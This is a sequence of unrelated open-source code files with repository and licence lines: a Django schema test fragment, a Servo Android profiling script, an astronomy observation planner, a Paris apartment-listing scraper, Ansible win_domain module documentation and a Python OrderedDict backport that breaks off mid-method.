field = next( f for f in connection.introspection.get_table_description(cursor, "schema_author") if f.name == "surname" ) if connection.features.can_introspect_default: self.assertIsNone(field.default) def test_alter_field_default_dropped(self): # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Create a row Author.objects.create(name='Anonymous1') self.assertEqual(Author.objects.get().height, None) old_field = Author._meta.get_field('height') # The default from the new field is used in updating existing rows. new_field = IntegerField(blank=True, default=42) new_field.set_attributes_from_name('height') with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field) self.assertEqual(Author.objects.get().height, 42) # The database default should be removed. with connection.cursor() as cursor: field = next( f for f in connection.introspection.get_table_description(cursor, "schema_author") if f.name == "height" ) if connection.features.can_introspect_default: self.assertIsNone(field.default)
bsd-3-clause
abhiQmar/servo
tests/heartbeats/characterize_android.py
139
4036
#!/usr/bin/env python # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import sys import os from os import path import time import datetime import argparse import subprocess TOP_DIR = path.join("..", "..") GUARD_TIME = 20 SUMMARY_OUTPUT = "summary.txt" def get_command(layout_thread_count, renderer, page, profile): """Get the command to execute. """ return path.join(TOP_DIR, "mach") + " run --android" + \ " -p %d -o /sdcard/servo/output.png -y %d %s -Z profile-script-events,profile-heartbeats '%s'" % \ (profile, layout_thread_count, renderer, page) def git_rev_hash(): """Get the git revision hash. """ return subprocess.check_output(['git', 'rev-parse', 'HEAD']).rstrip() def git_rev_hash_short(): """Get the git revision short hash. """ return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).rstrip() def execute(base_dir, renderer, page, profile, trial, layout_thread_count): """Run a single execution. 
""" log_dir = path.join(base_dir, "logs_l" + str(layout_thread_count), "trial_" + str(trial)) if os.path.exists(log_dir): print "Log directory already exists: " + log_dir sys.exit(1) os.makedirs(log_dir) # Execute cmd = get_command(layout_thread_count, renderer, page, profile) print cmd os.system(cmd) print 'sleep ' + str(GUARD_TIME) time.sleep(GUARD_TIME) # Write a file that describes this execution with open(path.join(log_dir, SUMMARY_OUTPUT), "w") as f: f.write("Datetime (UTC): " + datetime.datetime.utcnow().isoformat()) f.write("\nPlatform: Android") f.write("\nGit hash: " + git_rev_hash()) f.write("\nGit short hash: " + git_rev_hash_short()) f.write("\nLayout threads: " + str(layout_thread_count)) f.write("\nTrial: " + str(trial)) f.write("\nCommand: " + cmd) def main(): """For this script to be useful, the following conditions are needed: - Build servo for Android in release mode with the "energy-profiling" feature enabled. """ # Default number of layout threads layout_threads = 1 # Default benchmark benchmark = "https://www.mozilla.org/" # Default renderer renderer = "" # Default output directory output_dir = "heartbeat_logs" # Default profile interval profile = 60 # Parsing the input of the script parser = argparse.ArgumentParser(description="Characterize Servo timing and energy behavior on Android") parser.add_argument("-b", "--benchmark", default=benchmark, help="Gets the benchmark, for example \"-b http://www.example.com\"") parser.add_argument("-w", "--webrender", action='store_true', help="Use webrender backend") parser.add_argument("-l", "--layout_threads", help="Specify the number of threads for layout, for example \"-l 5\"") parser.add_argument("-o", "--output", help="Specify the log output directory, for example \"-o heartbeat_logs\"") parser.add_argument("-p", "--profile", default=60, help="Profiler output interval, for example \"-p 60\"") args = parser.parse_args() if args.benchmark: benchmark = args.benchmark if args.webrender: renderer = "-w" 
if args.layout_threads: layout_threads = int(args.layout_threads) if args.output: output_dir = args.output if args.profile: profile = args.profile if os.path.exists(output_dir): print "Output directory already exists: " + output_dir sys.exit(1) os.makedirs(output_dir) execute(output_dir, renderer, benchmark, profile, 1, layout_threads) if __name__ == "__main__": main()
mpl-2.0
pozar87/apts
apts/observations.py
1
8310
import logging from datetime import datetime, timedelta from string import Template import matplotlib.dates as mdates import numpy import pkg_resources import svgwrite as svg from matplotlib import pyplot from .conditions import Conditions from .objects.messier import Messier from .objects.planets import Planets from .utils import Utils from .constants import ObjectTableLabels logger = logging.getLogger(__name__) class Observation: NOTIFICATION_TEMPLATE = pkg_resources.resource_filename('apts', 'templates/notification.html.template') def __init__(self, place, equipment, conditions=Conditions()): self.place = place self.equipment = equipment self.conditions = conditions self.start, self.stop = self._normalize_dates( place.sunset_time(), place.sunrise_time()) self.local_messier = Messier(self.place) self.local_planets = Planets(self.place) # Compute time limit max_return_time = [int(value) for value in self.conditions.max_return.split(":")] time_limit = self.start.replace( hour=max_return_time[0], minute=max_return_time[1], second=max_return_time[2]) self.time_limit = time_limit if time_limit > self.start else time_limit + \ timedelta(days=1) def get_visible_messier(self, **args): return self.local_messier.get_visible(self.conditions, self.start, self.time_limit, **args) def get_visible_planets(self, **args): return self.local_planets.get_visible(self.conditions, self.start, self.time_limit, **args) def plot_visible_planets_svg(self, **args): visible_planets = self.get_visible_planets(**args) dwg = svg.Drawing() # Set y offset to biggest planet y = int(visible_planets[['Size']].max() + 12) # Set x offset to constant value x = 20 # Set delta to constant value minimal_delta = 52 last_radius = None for planet in visible_planets[['Name', 'Size', 'Phase']].values: name, radius, phase = planet[0], planet[1], str(round(planet[2], 2)) if last_radius is None: y += radius x += radius else: x += max(radius + last_radius + 10, minimal_delta) last_radius = radius 
dwg.add(svg.shapes.Circle(center=(x, y), r=radius, stroke="black", stroke_width="1", fill="#e4e4e4")) dwg.add(svg.text.Text(name, insert=(x, y + radius + 15), text_anchor='middle')) dwg.add(svg.text.Text(phase + '%', insert=(x, y - radius - 4), text_anchor='middle')) return dwg.tostring() def plot_visible_planets(self): try: from IPython.display import SVG except: logger.warning("You can plot images only in Ipython notebook!") return return SVG(self.plot_visible_planets_svg()) def _generate_plot_messier(self, **args): messier = self.get_visible_messier( )[[ObjectTableLabels.MESSIER, ObjectTableLabels.TRANSIT, ObjectTableLabels.ALTITUDE, ObjectTableLabels.WIDTH]] plot = messier.plot( x=ObjectTableLabels.TRANSIT, y=ObjectTableLabels.ALTITUDE, marker='o', # markersize = messier['Width'], linestyle='none', xlim=[self.start - timedelta(minutes=15), self.time_limit + timedelta(minutes=15)], ylim=(0, 90), **args) last_position = [0, 0] offset_index = 0 offsets = [(-25, -12), (5, 5), (-25, 5), (5, -12)] for obj in messier.values: distance = (((mdates.date2num( obj[1]) - last_position[0]) * 100) ** 2 + (obj[2] - last_position[1]) ** 2) ** 0.5 offset_index = offset_index + (1 if distance < 5 else 0) plot.annotate(obj[0], (mdates.date2num(obj[1]), obj[2]), xytext=offsets[offset_index % len(offsets)], textcoords='offset points') last_position = [mdates.date2num(obj[1]), obj[2]] self._mark_observation(plot) self._mark_good_conditions( plot, self.conditions.min_object_altitude, 90) Utils.annotate_plot(plot, 'Altitude [°]') return plot.get_figure() def _normalize_dates(self, start, stop): now = datetime.utcnow().astimezone(self.place.local_timezone) new_start = start if start < stop else now new_stop = stop return (new_start, new_stop) def plot_weather(self, **args): if self.place.weather is None: self.place.get_weather() self._generate_plot_weather(**args) def plot_messier(self, **args): self._generate_plot_messier(**args) def _compute_weather_goodnse(self): # Get critical 
weather data data = self.place.weather.get_critical_data(self.start, self.stop) # Get only data defore time limit data = data[data.time <= self.time_limit] all_hours = len(data) # Get hours with good conditions result = data[ (data.cloudCover < self.conditions.max_clouds) & (data.precipProbability < self.conditions.max_precipitation_probability) & (data.windSpeed < self.conditions.max_wind) & (data.temperature > self.conditions.min_temperature) & (data.temperature < self.conditions.max_temperature)] good_hours = len(result) logger.debug("Good hours: {} and all hours: {}".format(good_hours, all_hours)) # Return relative % of good hours return good_hours / all_hours * 100 def is_weather_good(self): if self.place.weather is None: self.place.get_weather() return self._compute_weather_goodnse() > self.conditions.min_weather_goodness def to_html(self): with open(Observation.NOTIFICATION_TEMPLATE) as template_file: template = Template(template_file.read()) data = { "title": "APTS", "start": Utils.format_date(self.start), "stop": Utils.format_date(self.stop), "planets_count": len(self.get_visible_planets()), "messier_count": len(self.get_visible_messier()), "planets_table": self.get_visible_planets().to_html(), "messier_table": self.get_visible_messier().to_html(), "equipment_table": self.equipment.data().to_html(), "place_name": self.place.name, "lat": numpy.rad2deg(self.place.lat), "lon": numpy.rad2deg(self.place.lon) } return str(template.substitute(data)) def _mark_observation(self, plot): # Check if there is a plot if plot is None: return # Add marker for night plot.axvspan(self.start, self.stop, color='gray', alpha=0.2) # Add marker for moon moon_start, moon_stop = self._normalize_dates( self.place.moonrise_time(), self.place.moonset_time()) plot.axvspan(moon_start, moon_stop, color='yellow', alpha=0.1) # Add marker for time limit plot.axvline(self.start, color='orange', linestyle='--') plot.axvline(self.time_limit, color='orange', linestyle='--') def 
_mark_good_conditions(self, plot, minimal, maximal): # Check if there is a plot if plot is None: return plot.axhspan(minimal, maximal, color='green', alpha=0.1) def _generate_plot_weather(self, **args): fig, axes = pyplot.subplots(nrows=4, ncols=2, figsize=(13, 18)) # Clouds plt = self.place.weather.plot_clouds(ax=axes[0, 0]) self._mark_observation(plt) self._mark_good_conditions(plt, 0, self.conditions.max_clouds) # Cloud summary plt = self.place.weather.plot_clouds_summary(ax=axes[0, 1]) # Precipation plt = self.place.weather.plot_precipitation(ax=axes[1, 0]) self._mark_observation(plt) self._mark_good_conditions( plt, 0, self.conditions.max_precipitation_probability) # precipitation type summary plt = self.place.weather.plot_precipitation_type_summary(ax=axes[1, 1]) # Temperature plt = self.place.weather.plot_temperature(ax=axes[2, 0]) self._mark_observation(plt) self._mark_good_conditions( plt, self.conditions.min_temperature, self.conditions.max_temperature) # Wind plt = self.place.weather.plot_wind(ax=axes[2, 1]) self._mark_observation(plt) self._mark_good_conditions(plt, 0, self.conditions.max_wind) # Pressure plt = self.place.weather.plot_pressure_and_ozone(ax=axes[3, 0]) self._mark_observation(plt) # Visibility plt = self.place.weather.plot_visibility(ax=axes[3, 1]) self._mark_observation(plt) fig.tight_layout() return fig
apache-2.0
amanzotti/paris_scraping
fetch.py
1
17484
import requests from bs4 import BeautifulSoup import sys import numpy as np # then add this function lower down from memory_profiler import profile import pandas as pd from sortedcontainers import SortedDict import datetime import bs4 # TODO # http://www.meilleursagents.com/immobilier/recherche/?item_types%5B%5D=369681781&item_types%5B%5D=369681782&transaction_type=369681778&place_ids%5B%5D=32696 # http://www.seloger.com/list.htm?idtt=1&idtypebien=1&cp=75&tri=initial def parse_source(html, encoding='utf-8'): parsed = BeautifulSoup(html, from_encoding=encoding) return parsed def fetch_meilleursagents(): base = 'http://www.meilleursagents.com/immobilier/recherche/?redirect_url=&view_mode=list&sort_mode=ma_contract%7Cdesc&transaction_type=369681778&buyer_search_id=&user_email=&place_ids%5B%5D=138724240&place_title=&item_types%5B%5D=369681781&item_types%5B%5D=369681782&item_area_min=&item_area_max=&budget_min=&budget_max=' resp = requests.get(base, timeout=150) resp.raise_for_status() # <- no-op if status==200 parsed = parse_source(resp.content, resp.encoding) def fetch_solger(): base = 'http://www.seloger.com/list.htm?idtt=1&idtypebien=1&cp=75&tri=initial' resp = requests.get(base, timeout=150) resp.raise_for_status() # <- no-op if status==200 parsed = parse_source(resp.content, resp.encoding) def fetch_pap(): base = 'http://www.pap.fr/annonce/locations-appartement-paris-14e-g37781' try: resp = requests.get(base, timeout=150) resp.raise_for_status() # <- no-op if status==200 resp_comb = resp.content except: pass listing = [] string = {} string[15] = '15e-g37782' string[13] = '13e-g37780' string[14] = '14e-g37781' string[2] = '2e-g37769' string[3] = '3e-g37770' string[4] = '4e-g37771' string[5] = '5e-g37772' string[6] = '6e-g37773' string[7] = '7e-g37774' string[8] = '8e-g37775' string[9] = '9e-g37776' string[10] = '10e-g37777' string[11] = '11e-g37778' string[12] = '12e-g37779' string[16] = '16e-g37783' string[17] = '17e-g37784' string[18] = '18e-g37785' string[19] = 
'19e-g37786' string[20] = '20e-g37787' for i in np.arange(2, 20): print(i) base2 = 'http://www.pap.fr/annonce/locations-appartement-paris-{}'.format(string[i]) try: resp_ = requests.get(base2, timeout=200) except: break # resp_.raise_for_status() # <- no-op if status==200 if resp_.status_code == 404: break parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings_pap(parsed)) # print(listing) # resp_comb += resp_.content + resp_comb for j in np.arange(1, 7): print(j) base2 = 'http://www.pap.fr/annonce/locations-appartement-paris-{}-{}'.format( string[i], j) try: resp_ = requests.get(base2, timeout=200) except: break # resp_.raise_for_status() # <- no-op if status==200 if resp_.status_code == 404: break # resp_comb += resp_.content + resp_comb parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings_pap(parsed)) # return resp_comb, resp.encoding return listing def fetch_fusac(): base = 'http://ads.fusac.fr/ad-category/housing/' listing = [] try: resp = requests.get(base, timeout=100) resp.raise_for_status() # <- no-op if status==200 resp_comb = resp.content parsed = parse_source(resp.content, resp.encoding) listing.append(extract_listings_fusac(parsed)) except: pass for i in np.arange(2, 6): base2 = 'http://ads.fusac.fr/ad-category/housing/housing-offers/page/{}/'.format(i) try: resp_ = requests.get(base2, timeout=100) except: continue # resp_.raise_for_status() # <- no-op if status==200 if resp_.status_code == 404: break # resp_comb += resp_.content + resp_comb parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings_fusac(parsed)) # return resp_comb, resp.encoding return listing # handle response 200 def fetch_search_results( query=None, minAsk=600, maxAsk=1450, bedrooms=None, bundleDuplicates=1, pets_cat=1 ): listing = [] search_params = { key: val for key, val in locals().items() if val is not None } if not search_params: raise ValueError("No valid keywords") base = 
'https://paris.craigslist.fr/search/apa' try: resp_ = requests.get(base, params=search_params, timeout=100) resp_.raise_for_status() # <- no-op if status==200 parsed = parse_source(resp_.content, resp_.encoding) listing.append(extract_listings(parsed)) except: return None return listing # def extract_listings(parsed): # listings = parsed.find_all("li", {"class": "result-row"}) # return listings def extract_listings_fusac(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all( 'div', {'class': "prod-cnt prod-box shadow Just-listed"}) extracted = [] for j, listing in enumerate(listings[0:]): # hood = listing.find('span', {'class': 'result-hood'}) # # print(hood) # # location = {key: listing.attrs.get(key, '') for key in location_attrs} # link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this # if link is not None: # descr = link.string.strip() # link_href = link.attrs['href'] price = listing.find('p', {'class': 'post-price'}) if price is not None: price = float(price.string.split()[0].replace(',', '')) # link = listing.find('div', {'class': 'listos'}).find('a',href=True)['href'] # resp = requests.get(link, timeout=10) # resp.raise_for_status() # <- no-op if status==200 desc = listing.find('p', {'class': 'post-desc'} ) if price is not None: desc = desc.string url = listing.find('div', {'class': "post-left"}).find('div', {'class': "grido"}).find('a', href=True).get('href') resp = requests.get(url, timeout=100) resp.raise_for_status() # <- no-op if status==200 parse = parse_source(resp.content, resp.encoding) try: ars = int(parse.find('div', {'class': "single-main"}).find('li', {'class': "acf-details-item"}, id="acf-cp_zipcode").find('span', {'class': 'acf-details-val'}).string[-2:]) except: ars = None this_listing = { # 'location': location, # 'link': link_href, # add this too 'price': price, 'desc': desc, # ==== # 'description': descr, 'pieces': None, 'meters': None, 'chambre': None, 'ars': ars, 'link': 
None } extracted.append(SortedDict(this_listing)) return extracted def extract_listings_pap(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all( 'div', {'class': "box search-results-item"}) extracted = [] for listing in listings[0:]: # hood = listing.find('span', {'class': 'result-hood'}) # # print(hood) # # location = {key: listing.attrs.get(key, '') for key in location_attrs} # link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this # if link is not None: # descr = link.string.strip() # link_href = link.attrs['href'] price = listing.find('span', {'class': 'price'}) if price is not None: price = float(price.string.split()[0].replace('.', '')) ref = listing.find('div', {'class': 'float-right'}).find('a', href=True)['href'] base = 'http://www.pap.fr/' + ref try: resp = requests.get(base, timeout=100) except: break link = base resp.raise_for_status() # <- no-op if status==200 resp_comb = parse_source(resp.content, resp.encoding) descr = resp_comb.find_all('p', {'class': 'item-description'})[0] desc = ' ' for line in descr.contents: if isinstance(line, bs4.element.NavigableString): desc += ' ' + line.string.strip('<\br>').strip('\n') # return resp_comb.find_all( # 'ul', {'class': 'item-summary'}) try: ars = int(resp_comb.find( 'div', {'class': 'item-geoloc'}).find('h2').string.split('e')[0][-2:]) except: break # return resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li') # print(resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li')) temp_dict_ = {} for lines in resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li'): tag = lines.contents[0].split()[0] value = int(lines.find_all('strong')[0].string.split()[0]) temp_dict_[tag] = value try: pieces = temp_dict_[u'Pi\xe8ces'] except: pieces = None try: chambre = temp_dict_[u'Chambre'] except: chambre = None try: square_meters = temp_dict_['Surface'] except: square_meters = None # meters = resp_comb.find_all('ul', 
{'class': 'item-summary'} # )[0].find_all('strong').string.split()[0] # link = listing.find('div', {'class': 'listos'}).find('a',href=True)['href'] # resp = requests.get(link, timeout=10) # resp.raise_for_status() # <- no-op if status==200 # desc = listing.find('p', {'class': 'post-desc'} # ) # if price is not None: # desc = desc.string # housing = listing.find('span', {'class': 'housing'}) # if housing is not None: # beds = housing.decode_contents().split('br')[0][-1] # rm = housing.decode_contents().split('m<sup>2</sup>')[0] # sqm = [int(s) for s in rm.split() if s.isdigit()] # if len(sqm) == 0: # sqm = None # else: # sqm = int(sqm[0]) this_listing = { # 'location': location, # 'link': link_href, # add this too # 'description': descr, # and this 'price': price, 'desc': desc, 'pieces': pieces, 'meters': square_meters, 'chambre': chambre, 'ars': ars, # 'meters': sqm, # 'beds': beds 'link': link } extracted.append(SortedDict(this_listing)) return extracted def extract_listings_solger(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all( 'article', {'class': "listing life_annuity gold"}) extracted = [] return listings # for listing in listings[0:]: # # hood = listing.find('span', {'class': 'result-hood'}) # # # print(hood) # # # location = {key: listing.attrs.get(key, '') for key in location_attrs} # # link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this # # if link is not None: # # descr = link.string.strip() # # link_href = link.attrs['href'] # price = listing.find('span', {'class': 'price'}) # if price is not None: # price = float(price.string.split()[0].replace('.', '')) # ref = listing.find('div', {'class': 'float-right'}).find('a', href=True)['href'] # base = 'http://www.pap.fr/' + ref # resp = requests.get(base, timeout=20) # link = base # resp.raise_for_status() # <- no-op if status==200 # resp_comb = parse_source(resp.content, resp.encoding) # descr = resp_comb.find_all('p', {'class': 
'item-description'})[0] # desc = ' ' # for line in descr.contents: # if isinstance(line, bs4.element.NavigableString): # desc += ' ' + line.string.strip('<\br>').strip('\n') # # return resp_comb.find_all( # # 'ul', {'class': 'item-summary'}) # try: # ars = int(resp_comb.find( # 'div', {'class': 'item-geoloc'}).find('h2').string.split('e')[0][-2:]) # except: # break # # return resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li') # # print(resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li')) # temp_dict_ = {} # for lines in resp_comb.find_all('ul', {'class': 'item-summary'})[0].find_all('li'): # tag = lines.contents[0].split()[0] # value = int(lines.find_all('strong')[0].string.split()[0]) # temp_dict_[tag] = value # try: # pieces = temp_dict_[u'Pi\xe8ces'] # except: # pieces = None # try: # chambre = temp_dict_[u'Chambre'] # except: # chambre = None # try: # square_meters = temp_dict_['Surface'] # except: # square_meters = None # # meters = resp_comb.find_all('ul', {'class': 'item-summary'} # # )[0].find_all('strong').string.split()[0] # # link = listing.find('div', {'class': 'listos'}).find('a',href=True)['href'] # # resp = requests.get(link, timeout=10) # # resp.raise_for_status() # <- no-op if status==200 # # desc = listing.find('p', {'class': 'post-desc'} # # ) # # if price is not None: # # desc = desc.string # # housing = listing.find('span', {'class': 'housing'}) # # if housing is not None: # # beds = housing.decode_contents().split('br')[0][-1] # # rm = housing.decode_contents().split('m<sup>2</sup>')[0] # # sqm = [int(s) for s in rm.split() if s.isdigit()] # # if len(sqm) == 0: # # sqm = None # # else: # # sqm = int(sqm[0]) # this_listing = { # # 'location': location, # # 'link': link_href, # add this too # # 'description': descr, # and this # 'price': price, # 'desc': desc, # 'pieces': pieces, # 'meters': square_meters, # 'chambre': chambre, # 'ars': ars, # # 'meters': sqm, # # 'beds': beds # 'link': link # } # 
extracted.append(SortedDict(this_listing)) # return extracted # parsed.find_all( # ...: 'div', {'class': "box search-results-item"})[0].find('div',{'class':'float-right'}).find('a',href=True)['href'] def extract_listings(parsed): # location_attrs = {'data-latitude': True, 'data-longitude': True} listings = parsed.find_all("li", {"class": "result-row"}) extracted = [] for listing in listings[2:]: hood = listing.find('span', {'class': 'result-hood'}) # print(hood) # location = {key: listing.attrs.get(key, '') for key in location_attrs} link = listing.find('a', {'class': 'result-title hdrlnk'}) # add this if link is not None: descr = link.string.strip() link_href = link.attrs['href'] price = listing.find('span', {'class': 'result-price'}) if price is not None: if price.string is not None: price = int(price.string[1:]) housing = listing.find('span', {'class': 'housing'}) if housing is not None: beds = housing.decode_contents().split('br')[0][-1] rm = housing.decode_contents().split('m<sup>2</sup>')[0] sqm = [int(s) for s in rm.split() if s.isdigit()] if len(sqm) == 0: sqm = None else: sqm = int(sqm[0]) this_listing = { # 'location': location, 'link': link_href, # add this too 'desc': descr, # and this 'price': price, 'meters': sqm, 'chambre': beds, 'pieces': None, 'ars': None } extracted.append(SortedDict(this_listing)) return extracted if __name__ == '__main__': # df = pd.read_pickle('./ipapartment_paris.pk') df = pd.DataFrame resu = [] print('loading fusac') resu.append(fetch_fusac()) print('loading pap') resu.append(fetch_pap()) print('loading craig') resu.append(fetch_search_results()) flat = [item for lis in resu for lis1 in lis for item in lis1] df_new = pd.DataFrame(flat) print('saving..') # df_new.to_pickle('./apartment_paris_{}.pk'.format(str(datetime.datetime.now()))) # df = pd.concat([df, df_new]) df_new.to_pickle('./apartment_paris.pk') print('Done.')
mit
richardcs/ansible
lib/ansible/modules/windows/win_domain.py
15
3882
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2017, Red Hat, Inc. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'core'} DOCUMENTATION = r''' module: win_domain short_description: Ensures the existence of a Windows domain version_added: 2.3 description: - Ensure that the domain named by C(dns_domain_name) exists and is reachable. - If the domain is not reachable, the domain is created in a new forest on the target Windows Server 2012R2+ host. - This module may require subsequent use of the M(win_reboot) action if changes are made. options: dns_domain_name: description: - The DNS name of the domain which should exist and be reachable or reside on the target Windows host. required: yes type: str domain_netbios_name: description: - The NetBIOS name for the root domain in the new forest. - For NetBIOS names to be valid for use with this parameter they must be single label names of 15 characters or less, if not it will fail. - If this parameter is not set, then the default is automatically computed from the value of the I(domain_name) parameter. type: str version_added: '2.6' safe_mode_password: description: - Safe mode password for the domain controller. required: yes type: str database_path: description: - The path to a directory on a fixed disk of the Windows host where the domain database will be created. - If not set then the default path is C(%SYSTEMROOT%\NTDS). type: path version_added: '2.5' sysvol_path: description: - The path to a directory on a fixed disk of the Windows host where the Sysvol file will be created. - If not set then the default path is C(%SYSTEMROOT%\SYSVOL). type: path version_added: '2.5' create_dns_delegation: description: - Whether to create a DNS delegation that references the new DNS server that you install along with the domain controller. - Valid for Active Directory-integrated DNS only. 
- The default is computed automatically based on the environment. type: bool version_added: '2.8' domain_mode: description: - Specifies the domain functional level of the first domain in the creation of a new forest. - The domain functional level cannot be lower than the forest functional level, but it can be higher. - The default is automatically computed and set. type: str choices: [ Win2003, Win2008, Win2008R2, Win2012, Win2012R2, WinThreshold ] version_added: '2.8' forest_mode: description: - Specifies the forest functional level for the new forest. - The default forest functional level in Windows Server is typically the same as the version you are running. # - Beware that the default forest functional level in Windows Server 2008 R2 when you create a new forest is C(Win2003). type: str choices: [ Win2003, Win2008, Win2008R2, Win2012, Win2012R2, WinThreshold ] version_added: '2.8' author: - Matt Davis (@nitzmahone) ''' RETURN = r''' reboot_required: description: True if changes were made that require a reboot. returned: always type: boolean sample: true ''' EXAMPLES = r''' - name: Create new domain in a new forest on the target host win_domain: dns_domain_name: ansible.vagrant safe_mode_password: password123! - name: Create new Windows domain in a new forest with specific parameters win_domain: create_dns_delegation: no database_path: C:\Windows\NTDS dns_domain_name: ansible.vagrant domain_mode: Win2012R2 domain_netbios_name: ANSIBLE forest_mode: Win2012R2 safe_mode_password: password123! sysvol_path: C:\Windows\SYSVOL register: domain_install '''
gpl-3.0
maikel-bakker/gulp-environment
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/ordered_dict.py
2354
10366
# Unmodified from http://code.activestate.com/recipes/576693/ # other than to add MIT license header (as specified on page, but not in code). # Linked from Python documentation here: # http://docs.python.org/2/library/collections.html#collections.OrderedDict # # This should be deleted once Py2.7 is available on all bots, see # http://crbug.com/241769. # # Copyright (c) 2009 Raymond Hettinger. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy. # Passes Python2.7's test suite and incorporates all the latest updates. try: from thread import get_ident as _get_ident except ImportError: from dummy_thread import get_ident as _get_ident try: from _abcoll import KeysView, ValuesView, ItemsView except ImportError: pass class OrderedDict(dict): 'Dictionary that remembers insertion order' # An inherited dict maps keys to values. # The inherited dict provides __getitem__, __len__, __contains__, and get. 
# The remaining methods are order-aware. # Big-O running times for all methods are the same as for regular dictionaries. # The internal self.__map dictionary maps keys to links in a doubly linked list. # The circular doubly linked list starts and ends with a sentinel element. # The sentinel element never gets deleted (this simplifies the algorithm). # Each link is stored as a list of length three: [PREV, NEXT, KEY]. def __init__(self, *args, **kwds): '''Initialize an ordered dictionary. Signature is the same as for regular dictionaries, but keyword arguments are not recommended because their insertion order is arbitrary. ''' if len(args) > 1: raise TypeError('expected at most 1 arguments, got %d' % len(args)) try: self.__root except AttributeError: self.__root = root = [] # sentinel node root[:] = [root, root, None] self.__map = {} self.__update(*args, **kwds) def __setitem__(self, key, value, dict_setitem=dict.__setitem__): 'od.__setitem__(i, y) <==> od[i]=y' # Setting a new item creates a new link which goes at the end of the linked # list, and the inherited dictionary is updated with the new key/value pair. if key not in self: root = self.__root last = root[0] last[1] = root[0] = self.__map[key] = [last, root, key] dict_setitem(self, key, value) def __delitem__(self, key, dict_delitem=dict.__delitem__): 'od.__delitem__(y) <==> del od[y]' # Deleting an existing item uses self.__map to find the link which is # then removed by updating the links in the predecessor and successor nodes. dict_delitem(self, key) link_prev, link_next, key = self.__map.pop(key) link_prev[1] = link_next link_next[0] = link_prev def __iter__(self): 'od.__iter__() <==> iter(od)' root = self.__root curr = root[1] while curr is not root: yield curr[2] curr = curr[1] def __reversed__(self): 'od.__reversed__() <==> reversed(od)' root = self.__root curr = root[0] while curr is not root: yield curr[2] curr = curr[0] def clear(self): 'od.clear() -> None. Remove all items from od.' 
try: for node in self.__map.itervalues(): del node[:] root = self.__root root[:] = [root, root, None] self.__map.clear() except AttributeError: pass dict.clear(self) def popitem(self, last=True): '''od.popitem() -> (k, v), return and remove a (key, value) pair. Pairs are returned in LIFO order if last is true or FIFO order if false. ''' if not self: raise KeyError('dictionary is empty') root = self.__root if last: link = root[0] link_prev = link[0] link_prev[1] = root root[0] = link_prev else: link = root[1] link_next = link[1] root[1] = link_next link_next[0] = root key = link[2] del self.__map[key] value = dict.pop(self, key) return key, value # -- the following methods do not depend on the internal structure -- def keys(self): 'od.keys() -> list of keys in od' return list(self) def values(self): 'od.values() -> list of values in od' return [self[key] for key in self] def items(self): 'od.items() -> list of (key, value) pairs in od' return [(key, self[key]) for key in self] def iterkeys(self): 'od.iterkeys() -> an iterator over the keys in od' return iter(self) def itervalues(self): 'od.itervalues -> an iterator over the values in od' for k in self: yield self[k] def iteritems(self): 'od.iteritems -> an iterator over the (key, value) items in od' for k in self: yield (k, self[k]) # Suppress 'OrderedDict.update: Method has no argument': # pylint: disable=E0211 def update(*args, **kwds): '''od.update(E, **F) -> None. Update od from dict/iterable E and F. 
If E is a dict instance, does: for k in E: od[k] = E[k] If E has a .keys() method, does: for k in E.keys(): od[k] = E[k] Or if E is an iterable of items, does: for k, v in E: od[k] = v In either case, this is followed by: for k, v in F.items(): od[k] = v ''' if len(args) > 2: raise TypeError('update() takes at most 2 positional ' 'arguments (%d given)' % (len(args),)) elif not args: raise TypeError('update() takes at least 1 argument (0 given)') self = args[0] # Make progressively weaker assumptions about "other" other = () if len(args) == 2: other = args[1] if isinstance(other, dict): for key in other: self[key] = other[key] elif hasattr(other, 'keys'): for key in other.keys(): self[key] = other[key] else: for key, value in other: self[key] = value for key, value in kwds.items(): self[key] = value __update = update # let subclasses override update without breaking __init__ __marker = object() def pop(self, key, default=__marker): '''od.pop(k[,d]) -> v, remove specified key and return the corresponding value. If key is not found, d is returned if given, otherwise KeyError is raised. ''' if key in self: result = self[key] del self[key] return result if default is self.__marker: raise KeyError(key) return default def setdefault(self, key, default=None): 'od.setdefault(k[,d]) -> 